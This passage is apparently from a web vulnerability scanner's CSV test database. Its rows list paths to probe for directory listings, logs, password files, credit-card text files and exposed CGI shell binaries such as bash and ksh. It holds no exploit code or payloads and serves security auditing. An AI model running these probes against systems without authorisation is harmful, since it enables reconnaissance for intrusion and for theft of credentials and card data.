\",\"\",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"001853\",\"3092\",\"1\",\"/solaris/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001854\",\"3268\",\"2\",\"/source/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"001855\",\"3092\",\"1\",\"/Sources/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  may be YaBB.\",\"\",\"\"\n\"001856\",\"3092\",\"1\",\"/spwd\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001857\",\"3268\",\"2\",\"/sql/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"001858\",\"3268\",\"2\",\"/src/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"001859\",\"3092\",\"1\",\"/srchadm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001860\",\"3092\",\"1\",\"/ss.cfg\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001861\",\"3268\",\"2\",\"/ssi/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"001862\",\"3092\",\"1\",\"/staff/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001863\",\"3092\",\"1\",\"/stat.htm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001864\",\"3092\",\"1\",\"/stat/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001865\",\"3092\",\"1\",\"/statistic/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001866\",\"3092\",\"1\",\"/Statistics/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001867\",\"3092\",\"1\",\"/statistics/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001868\",\"3092\",\"1\",\"/stats.htm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001869\",\"3092\",\"1\",\"/stats.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001870\",\"3092\",\"1\",\"/stats.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001871\",\"3092\",\"1\",\"/stats/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001872\",\"3092\",\"1\",\"/Stats/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001873\",\"3092\",\"1\",\"/status/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001874\",\"3092\",\"1\",\"/store/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001875\",\"3092\",\"1\",\"/StoreDB/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001876\",\"3092\",\"1\",\"/stylesheet/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001877\",\"3092\",\"1\",\"/stylesheets/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001878\",\"3092\",\"1\",\"/subir/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001879\",\"3092\",\"1\",\"/sun/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001880\",\"3092\",\"1\",\"/super_stats/access_logs\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001881\",\"3092\",\"1\",\"/super_stats/error_logs\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001882\",\"3092\",\"1\",\"/support/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001883\",\"3092\",\"1\",\"/swf\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  Flash files?\",\"\",\"\"\n\"001884\",\"3092\",\"1\",\"/sys/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001885\",\"3092\",\"1\",\"/system/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001886\",\"3092\",\"1\",\"/tar/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001887\",\"3092\",\"1\",\"/tarjetas/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001888\",\"3092\",\"1\",\"/temp/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001889\",\"3092\",\"1\",\"/template/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: could have sensitive files or system information.\",\"\",\"\"\n\"001890\",\"3092\",\"1\",\"/temporal/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001891\",\"3092\",\"1\",\"/test.htm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001892\",\"3092\",\"1\",\"/test.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001893\",\"3092\",\"1\",\"/test.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001894\",\"3092\",\"1\",\"/test/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001895\",\"3092\",\"1\",\"/testing/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001896\",\"3092\",\"1\",\"/tests/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001897\",\"3092\",\"1\",\"/tmp/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001898\",\"3092\",\"1\",\"/tools/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001899\",\"3092\",\"1\",\"/tpv/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001900\",\"3092\",\"1\",\"/trabajo/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001901\",\"3092\",\"1\",\"/trafficlog/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001902\",\"3092\",\"1\",\"/transito/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001903\",\"3092\",\"1\",\"/tree/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001904\",\"3092\",\"1\",\"/trees/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001905\",\"3092\",\"1\",\"/updates/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001906\",\"3092\",\"1\",\"/user/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001907\",\"3092\",\"1\",\"/users/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001908\",\"3092\",\"1\",\"/users/scripts/submit.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001909\",\"3092\",\"1\",\"/ustats/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001910\",\"3092\",\"1\",\"/usuario/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001911\",\"3092\",\"1\",\"/usuarios/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001912\",\"3092\",\"1\",\"/vfs/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001913\",\"3092\",\"1\",\"/w3perl/admin\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001914\",\"3092\",\"1\",\"/warez/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001915\",\"3092\",\"1\",\"/web/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001916\",\"3092\",\"1\",\"/web800fo/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001917\",\"3092\",\"1\",\"/webaccess.htm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001918\",\"3092\",\"1\",\"/webaccess/access-options.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001919\",\"3092\",\"1\",\"/webadmin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: probably HostingController, www.hostingcontroller.com\",\"\",\"\"\n\"001920\",\"3092\",\"1\",\"/webboard/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001921\",\"3092\",\"1\",\"/webcart-lite/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001922\",\"3092\",\"1\",\"/webcart/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001923\",\"3092\",\"1\",\"/webdata/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001924\",\"3092\",\"1\",\"/weblog/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001925\",\"3092\",\"1\",\"/weblogs/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001926\",\"3092\",\"1\",\"/webmaster_logs/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001927\",\"3092\",\"1\",\"/WebShop/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001928\",\"3092\",\"1\",\"/WebShop/logs/cc.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001929\",\"3092\",\"1\",\"/WebShop/templates/cc.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001930\",\"3092\",\"1\",\"/website/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001931\",\"3092\",\"1\",\"/webstats/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001932\",\"3092\",\"1\",\"/WebTrend/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001933\",\"3092\",\"1\",\"/Web_store/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001934\",\"3092\",\"1\",\"/windows/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001935\",\"3092\",\"1\",\"/word/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001936\",\"3092\",\"1\",\"/work/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001937\",\"3092\",\"1\",\"/wstats/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001938\",\"3092\",\"1\",\"/wusage/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001939\",\"3092\",\"1\",\"/www-sql/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001940\",\"3092\",\"1\",\"/www/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001941\",\"3092\",\"1\",\"/wwwboard/wwwboard.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001942\",\"3092\",\"1\",\"/wwwboard/wwwboard.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001943\",\"3092\",\"1\",\"/wwwjoin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001944\",\"3092\",\"1\",\"/wwwlog/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001945\",\"3092\",\"1\",\"/wwwstats.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001946\",\"3092\",\"1\",\"/wwwstats/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001947\",\"3092\",\"1\",\"/wwwthreads/3tvars.pm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001948\",\"3092\",\"1\",\"/wwwthreads/w3tvars.pm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001949\",\"3092\",\"1\",\"/zipfiles/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001950\",\"3268\",\"2\",\"/_pages\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"001952\",\"3092\",\"1\",\"@CGIDIRS.fhp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001953\",\"3092\",\"1\",\"@CGIDIRSadd_ftp.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001954\",\"3092\",\"1\",\"@CGIDIRSadmin.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001955\",\"3092\",\"1\",\"@CGIDIRSadmin.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001956\",\"3092\",\"1\",\"@CGIDIRSadmin.php3\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001957\",\"3092\",\"1\",\"@CGIDIRSadmin.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001958\",\"3092\",\"1\",\"@CGIDIRSadminhot.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner. \",\"\",\"\"\n\"001959\",\"3092\",\"1\",\"@CGIDIRSadminwww.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner. \",\"\",\"\"\n\"001960\",\"3092\",\"1\",\"@CGIDIRSAnyBoard.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001961\",\"3092\",\"1\",\"@CGIDIRSAnyForm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001962\",\"3092\",\"1\",\"@CGIDIRSAnyForm2\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001963\",\"3092\",\"1\",\"@CGIDIRSash\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  possibly a system shell found.\",\"\",\"\"\n\"001964\",\"3092\",\"1\",\"@CGIDIRSax-admin.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001965\",\"3092\",\"1\",\"@CGIDIRSax.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001966\",\"3092\",\"1\",\"@CGIDIRSaxs.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001967\",\"3092\",\"1\",\"@CGIDIRSbash\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  possibly a system shell found.\",\"\",\"\"\n\"001968\",\"3092\",\"1\",\"@CGIDIRSbnbform\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001969\",\"3092\",\"1\",\"@CGIDIRSbnbform.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001970\",\"3092\",\"1\",\"@CGIDIRScart.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001971\",\"3092\",\"1\",\"@CGIDIRScgimail.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001972\",\"3092\",\"1\",\"@CGIDIRSclassifieds\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001973\",\"3092\",\"1\",\"@CGIDIRSclassifieds.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001974\",\"3092\",\"1\",\"@CGIDIRSclickcount.pl?view=test\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001975\",\"3092\",\"1\",\"@CGIDIRScode.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001976\",\"3092\",\"1\",\"@CGIDIRScode.php3\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001977\",\"3092\",\"1\",\"@CGIDIRScount.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001978\",\"3092\",\"1\",\"@CGIDIRScsh\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  possibly a system shell found.\",\"\",\"\"\n\"001979\",\"3092\",\"1\",\"@CGIDIRScstat.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001980\",\"3092\",\"1\",\"@CGIDIRSc_download.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001981\",\"3092\",\"1\",\"@CGIDIRSdasp/fm_shell.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001982\",\"3092\",\"1\",\"@CGIDIRSday5datacopier.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001983\",\"3092\",\"1\",\"@CGIDIRSdfire.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001984\",\"3092\",\"1\",\"@CGIDIRSdig.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001985\",\"3092\",\"1\",\"@CGIDIRSdisplayTC.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001986\",\"3092\",\"1\",\"@CGIDIRSedit.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001987\",\"3092\",\"1\",\"@CGIDIRSenter.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001988\",\"3092\",\"1\",\"@CGIDIRSenviron.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001989\",\"3092\",\"1\",\"@CGIDIRSenviron.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001990\",\"3092\",\"1\",\"@CGIDIRSex-logger.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001991\",\"3092\",\"1\",\"@CGIDIRSexcite\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001992\",\"3092\",\"1\",\"@CGIDIRSfilemail\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001993\",\"3092\",\"1\",\"@CGIDIRSfilemail.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001994\",\"3092\",\"1\",\"@CGIDIRSftp.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  is file transfer allowed?\",\"\",\"\"\n\"001995\",\"3092\",\"1\",\"@CGIDIRSftpsh\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  possibly a system shell found.\",\"\",\"\"\n\"001996\",\"3092\",\"1\",\"@CGIDIRSgetdoc.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001997\",\"3092\",\"1\",\"@CGIDIRSglimpse\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001998\",\"3092\",\"1\",\"@CGIDIRShitview.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"001999\",\"3092\",\"1\",\"@CGIDIRSjailshell\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  possibly a system shell found.\",\"\",\"\"\n\"002000\",\"105\",\"1\",\"@CGIDIRSjj\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Allows attackers to execute commands as http daemon\",\"\",\"\"\n\"002001\",\"3092\",\"1\",\"@CGIDIRSksh\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  possibly a system shell found.\",\"\",\"\"\n\"002002\",\"3092\",\"1\",\"@CGIDIRSlog-reader.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002003\",\"3092\",\"1\",\"@CGIDIRSlog/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002004\",\"3092\",\"1\",\"@CGIDIRSlogin.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002005\",\"3092\",\"1\",\"@CGIDIRSlogin.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002006\",\"3092\",\"1\",\"@CGIDIRSlogit.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002007\",\"3092\",\"1\",\"@CGIDIRSlogs.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002008\",\"3092\",\"1\",\"@CGIDIRSlogs/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002009\",\"3092\",\"1\",\"@CGIDIRSlogs/access_log\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002010\",\"3092\",\"1\",\"@CGIDIRSlogs/error_log\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002011\",\"3092\",\"1\",\"@CGIDIRSlookwho.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002012\",\"3092\",\"1\",\"@CGIDIRSmaillist.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002013\",\"3092\",\"1\",\"@CGIDIRSmaillist.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002014\",\"3092\",\"1\",\"@CGIDIRSman.sh\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002015\",\"3092\",\"1\",\"@CGIDIRSmeta.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002016\",\"3092\",\"1\",\"@CGIDIRSminimal.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002017\",\"3092\",\"1\",\"@CGIDIRSnlog-smb.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002018\",\"3092\",\"1\",\"@CGIDIRSnlog-smb.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002019\",\"3092\",\"1\",\"@CGIDIRSnoshell\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  possibly a system shell found.\",\"\",\"\"\n\"002020\",\"3092\",\"1\",\"@CGIDIRSnph-publish\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002021\",\"3092\",\"1\",\"@CGIDIRSntitar.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002022\",\"3092\",\"1\",\"@CGIDIRSpass\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002023\",\"3092\",\"1\",\"@CGIDIRSpasswd\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002024\",\"3092\",\"1\",\"@CGIDIRSpasswd.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002025\",\"3092\",\"1\",\"@CGIDIRSpassword\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002026\",\"3092\",\"1\",\"@CGIDIRSpost_query\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002027\",\"3092\",\"1\",\"@CGIDIRSpu3.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002028\",\"3092\",\"1\",\"@CGIDIRSratlog.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002029\",\"3092\",\"1\",\"@CGIDIRSresponder.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002030\",\"3092\",\"1\",\"@CGIDIRSrguest.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002031\",\"3092\",\"1\",\"@CGIDIRSrksh\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  possibly a system shell found.\",\"\",\"\"\n\"002032\",\"3092\",\"1\",\"@CGIDIRSrsh\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  possibly a system shell found.\",\"\",\"\"\n\"002033\",\"3092\",\"1\",\"@CGIDIRSsearch.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002034\",\"3092\",\"1\",\"@CGIDIRSsearch.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002035\",\"3092\",\"1\",\"@CGIDIRSsession/adminlogin\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002036\",\"3092\",\"1\",\"@CGIDIRSsh\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  possibly a system shell found.\",\"\",\"\"\n\"002037\",\"3092\",\"1\",\"@CGIDIRSshow.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"002038\",\"3092\",\"1\",\"@CGIDIRSstat/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be 